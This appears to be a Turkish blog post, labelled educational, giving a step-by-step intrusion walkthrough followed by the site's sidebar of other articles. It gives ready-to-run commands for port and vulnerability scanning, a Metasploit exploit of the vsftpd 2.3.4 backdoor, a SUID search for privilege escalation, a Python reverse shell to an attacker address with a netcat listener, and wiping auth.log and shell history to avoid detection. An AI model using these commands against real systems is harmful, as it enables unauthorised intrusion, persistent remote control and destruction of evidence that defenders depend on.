Penetrasyon Testi için Adımlar (Eğitim Amaçlı)

📌 1. Bilgi Toplama (Reconnaissance)

Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.

🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)

bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1

Bu komut:
SYN taraması yapar
Tüm portları tarar
Açık portları ve servisleri listeler


📌 2. Zafiyet Analizi

Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.

🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama

bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1

Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.


📌 3. Exploitation (İstismar)

Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.

🔹 Metasploit ile Exploit Çalıştırma

bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit

Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.


📌 4. Yetki Yükseltme (Privilege Escalation)

Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.

🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)

bashKopyalaDüzenlefind / -perm -4000 2>/dev/null

Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash dosyası varsa, root yetkisine sahip olabiliriz.


📌 5. Kalıcı Erişim Sağlama

Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.

🔹 Python ile Reverse Shell Bağlantısı

Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:

bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bunun için saldırgan tarafında nc dinleyici açmalıyız:

bashKopyalaDüzenlenc -lvp 4444

Bağlantı sağlandığında hacker, hedef makinede shell elde eder.


📌 6. Logları Silme ve Raporlama

Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.

🔹 Linux Log Temizleme

bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c

Bu komut, yetkisiz erişim izlerini kaldırır.


📌 Akış Diyagramı

Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:

plaintextKopyalaDüzenle        Başlangıç
            |
            ▼
   📡 Bilgi Toplama
   (Nmap, Recon-ng)
            |
            ▼
 🔍 Zafiyet Tespiti
   (Exploit-DB, CVE)
            |
            ▼
 💣 Exploitation
   (Metasploit, RCE)
            |
            ▼
 🚀 Yetki Yükseltme
   (Privilege Escalation)
            |
            ▼
 🔒 Kalıcı Erişim
   (Reverse Shell)
            |
            ▼
 📊 Raporlama ve Log Temizleme
            |
            ▼
        Bitiş ✅
  • Gönderiler/Makaleler/Tezler

    DARK WEB TARAMASI VE TAKTİKSEL SİBER İSTİHBARAT: MODERN YAKLAŞIMLAR VE TEKNİK ARAÇLAR

    Selçuk DİKİCİ – Endüstri Mühendisi ÖzetBu çalışma, siber saldırıların hazırlık ve organizasyon süreçlerinde dark web’in stratejik rolünü ve bu ortamdan elde edilen taktiksel istihbaratın önemini teknik bağlamda irdelemektedir. Dark web…

    En Güncel Siber Saldırı İstihbaratı Yöntemleri

    Yazar: Selçuk DİKİCİ – Endüstri Mühendisi Dijitalleşmenin hızla ilerlediği günümüzde, siber saldırılar artık yalnızca bilişim sistemlerinin değil; devletlerin, şirketlerin ve bireylerin stratejik güvenliğini tehdit eden çok boyutlu bir kriz haline…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    DARK WEB TARAMASI VE TAKTİKSEL SİBER İSTİHBARAT: MODERN YAKLAŞIMLAR VE TEKNİK ARAÇLAR

    • By admin
    • Mayıs 5, 2025
    • 95 views
    DARK WEB TARAMASI VE TAKTİKSEL SİBER İSTİHBARAT: MODERN YAKLAŞIMLAR VE TEKNİK ARAÇLAR

    En Güncel Siber Saldırı İstihbaratı Yöntemleri

    • By admin
    • Mayıs 5, 2025
    • 63 views
    En Güncel Siber Saldırı İstihbaratı Yöntemleri

    Yapay Zeka Destekli Konteyner Kontrolü:

    • By admin
    • Nisan 17, 2025
    • 48 views
    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    • By admin
    • Nisan 17, 2025
    • 64 views
    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    • By admin
    • Nisan 17, 2025
    • 61 views
    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    • By admin
    • Nisan 17, 2025
    • 61 views
    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?